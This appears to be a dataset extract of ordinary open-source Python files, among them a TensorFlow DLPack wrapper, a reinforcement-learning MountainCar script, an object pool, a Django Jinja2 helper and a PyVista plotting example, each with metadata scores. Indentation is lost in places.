| <filename>python/tfdlpack/core.py<gh_stars>10-100
# pylint: disable=no-name-in-module, invalid-name, no-member
"""core functions"""
import tensorflow as tf
from tensorflow.python.framework import load_library
from . import libinfo
from .capsule_api import to_capsule, get_capsule_address
# version number
__version__ = libinfo.__version__
# find lib
libname = libinfo.get_libname(tf.__version__)
dlpack_ops = load_library.load_op_library(libinfo.find_lib_path(libname)[0])
_to_dlpack_address = dlpack_ops.to_dlpack
_from_dlpack = dlpack_ops.from_dlpack
_get_device_and_dtype = dlpack_ops.get_device_and_dtype
_destruct_dlpack = dlpack_ops.destruct_dlpack
def _destruct_capsule(dlm_address):
with tf.device("cpu"):
_destruct_dlpack(dlm_address)
def to_dlpack(tf_tensor):
"""Convert the given tensorflow tensor to DLPack format.
"""
with tf.device(tf_tensor.device):
cap = to_capsule(_to_dlpack_address(tf_tensor))
return cap
def get_device_and_dtype(dl_capsule):
"""Get capsule's device and its corresponding dtype
First element is device type and second is device id (according to DLPack protocal)
Third element is the tf data type (can be convert to tf type by tf.DType(d) )
"""
ptr = get_capsule_address(dl_capsule)
with tf.device('/cpu:0'):
ad_tensor = tf.constant([ptr], dtype=tf.uint64)
return _get_device_and_dtype(ad_tensor).numpy()
def from_dlpack(dl_capsule):
"""Convert capsule to tf tensor"""
device_and_dtype = get_device_and_dtype(dl_capsule)
device = device_and_dtype[:2]
dtype = device_and_dtype[2]
ptr = get_capsule_address(dl_capsule, consume=True)
if device[0] == 1:
tf_device_type = "cpu"
tf_device_id = int(device[1])
elif device[0] == 2:
tf_device_type = "gpu"
tf_device_id = int(device[1])
else:
raise RuntimeError("Unsupported Device")
tf_device = "/{}:{}".format(tf_device_type, tf_device_id)
with tf.device("cpu:0"):
ad_tensor = tf.constant([ptr], dtype=tf.uint64)
with tf.device(tf_device):
tf_tensor = _from_dlpack(ad_tensor, T=tf.DType(dtype))
return tf_tensor
| en | 0.736157 | # pylint: disable=no-name-in-module, invalid-name, no-member core functions # version number # find lib Convert the given tensorflow tensor to DLPack format. Get capsule's device and its corresponding dtype First element is device type and second is device id (according to DLPack protocal) Third element is the tf data type (can be convert to tf type by tf.DType(d) ) Convert capsule to tf tensor | 2.403927 | 2 |
PolicyGradient/Car.py | TobiasLee/ReinforcementLearningPractice | 2 | 6617443 | import gym
from RL_agent import PolicyGradient
import matplotlib.pyplot as plt
threshold = -2000
render = False
env = gym.make("MountainCar-v0")
env.seed(1)
env = env.unwrapped
print(env.action_space)
print(env.observation_space)
print(env.observation_space.high)
print(env.observation_space.low)
RL = PolicyGradient(
n_actions=env.action_space.n,
n_features = env.observation_space.shape[0],
lr = 0.02,
reward_decay = 0.995
)
for i in range(1000):
observation = env.reset()
while True:
if render:
env.render()
action = RL.choose_action(observation)
observation_, reward, done, info = env.step(action)
RL.store_transition(observation, action, reward)
if done: # episode finished
ep_rs_sum = sum(RL.ep_rs)
if "running_reward" not in globals():
running_reward = ep_rs_sum
else:
running_reward = running_reward * 0.99 + ep_rs_sum * 0.01
if running_reward > threshold:
render = True
print("episode: ", i, " reward: ", int(running_reward))
vt = RL.learn()
if i == 30:
plt.plot(vt)
plt.ylabel('normalized state-action value')
plt.show()
break
observation = observation_ # update states | import gym
from RL_agent import PolicyGradient
import matplotlib.pyplot as plt
threshold = -2000
render = False
env = gym.make("MountainCar-v0")
env.seed(1)
env = env.unwrapped
print(env.action_space)
print(env.observation_space)
print(env.observation_space.high)
print(env.observation_space.low)
RL = PolicyGradient(
n_actions=env.action_space.n,
n_features = env.observation_space.shape[0],
lr = 0.02,
reward_decay = 0.995
)
for i in range(1000):
observation = env.reset()
while True:
if render:
env.render()
action = RL.choose_action(observation)
observation_, reward, done, info = env.step(action)
RL.store_transition(observation, action, reward)
if done: # episode finished
ep_rs_sum = sum(RL.ep_rs)
if "running_reward" not in globals():
running_reward = ep_rs_sum
else:
running_reward = running_reward * 0.99 + ep_rs_sum * 0.01
if running_reward > threshold:
render = True
print("episode: ", i, " reward: ", int(running_reward))
vt = RL.learn()
if i == 30:
plt.plot(vt)
plt.ylabel('normalized state-action value')
plt.show()
break
observation = observation_ # update states | en | 0.940109 | # episode finished # update states | 2.877755 | 3 |
object_pool/__init__.py | btmorex/object_pool | 12 | 6617444 | from contextlib import contextmanager
import threading
from time import time
__version__ = 0.2
class ObjectPoolTimeout(RuntimeError):
pass
class ObjectPool(object):
def __init__(self, create, max_size=None):
self._create = create
self._max_size = max_size
self._size = 0
self._items = []
self._mutex = threading.Lock()
self._item_available = threading.Condition(self._mutex)
def get(self, timeout=None):
with self._mutex:
if not self._items and (self._max_size is None or self._size < self._max_size):
item = self._create()
self._size += 1
else:
if timeout is not None:
end = time() + timeout
while not self._items:
remaining = timeout
if timeout is not None:
remaining = end - time()
if remaining <= 0.0:
raise ObjectPoolTimeout
self._item_available.wait(remaining)
item = self._items.pop()
return item
def put(self, item):
with self._mutex:
self._items.append(item)
self._item_available.notify()
@contextmanager
def item(self):
item = self.get()
try:
yield item
finally:
self.put(item)
| from contextlib import contextmanager
import threading
from time import time
__version__ = 0.2
class ObjectPoolTimeout(RuntimeError):
pass
class ObjectPool(object):
def __init__(self, create, max_size=None):
self._create = create
self._max_size = max_size
self._size = 0
self._items = []
self._mutex = threading.Lock()
self._item_available = threading.Condition(self._mutex)
def get(self, timeout=None):
with self._mutex:
if not self._items and (self._max_size is None or self._size < self._max_size):
item = self._create()
self._size += 1
else:
if timeout is not None:
end = time() + timeout
while not self._items:
remaining = timeout
if timeout is not None:
remaining = end - time()
if remaining <= 0.0:
raise ObjectPoolTimeout
self._item_available.wait(remaining)
item = self._items.pop()
return item
def put(self, item):
with self._mutex:
self._items.append(item)
self._item_available.notify()
@contextmanager
def item(self):
item = self.get()
try:
yield item
finally:
self.put(item)
| none | 1 | 3.097675 | 3 | |
src/misc/fold.py | Ynakatsuka/nishika-22 | 4 | 6617445 | <gh_stars>1-10
import os
import pprint
import sys
import hydra
import pandas as pd
from hydra.utils import instantiate
from omegaconf import DictConfig, OmegaConf
sys.path.append("src/")
@hydra.main(config_path="../../config", config_name="default")
def main(config: DictConfig) -> None:
print("-" * 100)
pprint.PrettyPrinter(indent=2).pprint(
OmegaConf.to_container(config, resolve=True)
)
fold_column = config.fold.fold_column
train = pd.read_csv(config.fold.input_path)
print(train.head(3))
print(train.shape)
y = train[config.competition.target_column]
groups = None
if hasattr(config.competition, "group_column") and (
config.competition.group_column is not None
):
groups = train[config.competition.group_column]
# split
train[fold_column] = 0
kfold = instantiate(config.fold.fold)
for f, (_, valid_index) in enumerate(
kfold.split(train, y=y, groups=groups)
):
train.loc[valid_index, fold_column] = f
path = os.path.join(config.save_dir, config.fold.csv_filename)
train.to_csv(path, index=False)
if __name__ == "__main__":
main()
| import os
import pprint
import sys
import hydra
import pandas as pd
from hydra.utils import instantiate
from omegaconf import DictConfig, OmegaConf
sys.path.append("src/")
@hydra.main(config_path="../../config", config_name="default")
def main(config: DictConfig) -> None:
print("-" * 100)
pprint.PrettyPrinter(indent=2).pprint(
OmegaConf.to_container(config, resolve=True)
)
fold_column = config.fold.fold_column
train = pd.read_csv(config.fold.input_path)
print(train.head(3))
print(train.shape)
y = train[config.competition.target_column]
groups = None
if hasattr(config.competition, "group_column") and (
config.competition.group_column is not None
):
groups = train[config.competition.group_column]
# split
train[fold_column] = 0
kfold = instantiate(config.fold.fold)
for f, (_, valid_index) in enumerate(
kfold.split(train, y=y, groups=groups)
):
train.loc[valid_index, fold_column] = f
path = os.path.join(config.save_dir, config.fold.csv_filename)
train.to_csv(path, index=False)
if __name__ == "__main__":
main() | none | 1 | 2.464822 | 2 | |
starter_app/utils/jinja.py | reorx/django_starter_pack | 2 | 6617446 | import jinja2
from jinja2 import PackageLoader
from django.utils.timezone import template_localtime
from django.http import HttpResponse
from django.views.generic import View
root_pkg_name = 'starter_app'
template_dir_name = 'templates'
def get_jinja2_env():
loader = PackageLoader(root_pkg_name, package_path=template_dir_name)
env = jinja2.Environment(loader=loader)
env.filters.update({
'localtime': template_localtime,
})
env.globals.update({
'localtime': template_localtime,
})
# env.filters['round_str'] = round_str
return env
jinja2_env = get_jinja2_env()
def get_template(name):
return jinja2_env.get_template(name)
# jinja2 equivant of django.shortcuts.render
def render(request, template_name, context: dict, status=200):
return HttpResponse(
get_template(template_name).render(**context),
status=status,
)
class WebView(View):
template_name = ''
def render_to_response(self, template_name=None, context=None, status=200):
if context is None:
context = {}
if not template_name:
template_name = self.template_name
# add functions here
# context.update(
# foo=foo,
# )
return render(
self.request,
template_name,
context,
status=status,
)
| import jinja2
from jinja2 import PackageLoader
from django.utils.timezone import template_localtime
from django.http import HttpResponse
from django.views.generic import View
root_pkg_name = 'starter_app'
template_dir_name = 'templates'
def get_jinja2_env():
loader = PackageLoader(root_pkg_name, package_path=template_dir_name)
env = jinja2.Environment(loader=loader)
env.filters.update({
'localtime': template_localtime,
})
env.globals.update({
'localtime': template_localtime,
})
# env.filters['round_str'] = round_str
return env
jinja2_env = get_jinja2_env()
def get_template(name):
return jinja2_env.get_template(name)
# jinja2 equivant of django.shortcuts.render
def render(request, template_name, context: dict, status=200):
return HttpResponse(
get_template(template_name).render(**context),
status=status,
)
class WebView(View):
template_name = ''
def render_to_response(self, template_name=None, context=None, status=200):
if context is None:
context = {}
if not template_name:
template_name = self.template_name
# add functions here
# context.update(
# foo=foo,
# )
return render(
self.request,
template_name,
context,
status=status,
)
| en | 0.169769 | # env.filters['round_str'] = round_str # jinja2 equivant of django.shortcuts.render # add functions here # context.update( # foo=foo, # ) | 2.229072 | 2 |
tests/__init__.py | oscarlorentzon/repstruct | 2 | 6617447 | <reponame>oscarlorentzon/repstruct
__author__ = 'osclor'
| __author__ = 'osclor' | none | 1 | 1.050442 | 1 | |
reseller_cashback/authentication/apps.py | cesarbruschetta/reseller-cashback | 1 | 6617448 | from django.apps import AppConfig
class AuthConfig(AppConfig): # type: ignore
name = 'authentication'
| from django.apps import AppConfig
class AuthConfig(AppConfig): # type: ignore
name = 'authentication'
| it | 0.190853 | # type: ignore | 1.239366 | 1 |
layout/urls.py | AsianMiracle/django-base-template | 26 | 6617449 | <gh_stars>10-100
"""urlconf for the layout application"""
from django.conf.urls import url
from layout.views import home
urlpatterns =[
url(r'^$', home),
]
| """urlconf for the layout application"""
from django.conf.urls import url
from layout.views import home
urlpatterns =[
url(r'^$', home),
] | en | 0.836434 | urlconf for the layout application | 1.422279 | 1 |
locale/pot/api/plotting/_autosummary/pyvista-Plotter-add_mesh-1.py | tkoyama010/pyvista-doc-translations | 4 | 6617450 | # Add a sphere to the plotter and show it with a custom scalar
# bar title.
#
import pyvista
sphere = pyvista.Sphere()
sphere['Data'] = sphere.points[:, 2]
plotter = pyvista.Plotter()
_ = plotter.add_mesh(sphere,
scalar_bar_args={'title': 'Z Position'})
plotter.show()
#
# Plot using RGB on a single cell. Note that since the number of
# points and the number of cells are identical, we have to pass
# ``preference='cell'``.
#
import pyvista
import numpy as np
vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]])
faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]])
mesh = pyvista.PolyData(vertices, faces)
mesh.cell_data['colors'] = [[255, 255, 255],
[0, 255, 0],
[0, 0, 255],
[255, 0, 0]]
plotter = pyvista.Plotter()
_ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
rgb=True, preference='cell')
plotter.camera_position='xy'
plotter.show()
#
# Note how this varies from ``preference=='point'``. This is
# because each point is now being individually colored, versus
# in ``preference=='point'``, each cell face is individually
# colored.
#
plotter = pyvista.Plotter()
_ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
rgb=True, preference='point')
plotter.camera_position='xy'
plotter.show()
| # Add a sphere to the plotter and show it with a custom scalar
# bar title.
#
import pyvista
sphere = pyvista.Sphere()
sphere['Data'] = sphere.points[:, 2]
plotter = pyvista.Plotter()
_ = plotter.add_mesh(sphere,
scalar_bar_args={'title': 'Z Position'})
plotter.show()
#
# Plot using RGB on a single cell. Note that since the number of
# points and the number of cells are identical, we have to pass
# ``preference='cell'``.
#
import pyvista
import numpy as np
vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]])
faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]])
mesh = pyvista.PolyData(vertices, faces)
mesh.cell_data['colors'] = [[255, 255, 255],
[0, 255, 0],
[0, 0, 255],
[255, 0, 0]]
plotter = pyvista.Plotter()
_ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
rgb=True, preference='cell')
plotter.camera_position='xy'
plotter.show()
#
# Note how this varies from ``preference=='point'``. This is
# because each point is now being individually colored, versus
# in ``preference=='point'``, each cell face is individually
# colored.
#
plotter = pyvista.Plotter()
_ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
rgb=True, preference='point')
plotter.camera_position='xy'
plotter.show()
| en | 0.888998 | # Add a sphere to the plotter and show it with a custom scalar # bar title. # # # Plot using RGB on a single cell. Note that since the number of # points and the number of cells are identical, we have to pass # ``preference='cell'``. # # # Note how this varies from ``preference=='point'``. This is # because each point is now being individually colored, versus # in ``preference=='point'``, each cell face is individually # colored. # | 3.121056 | 3 |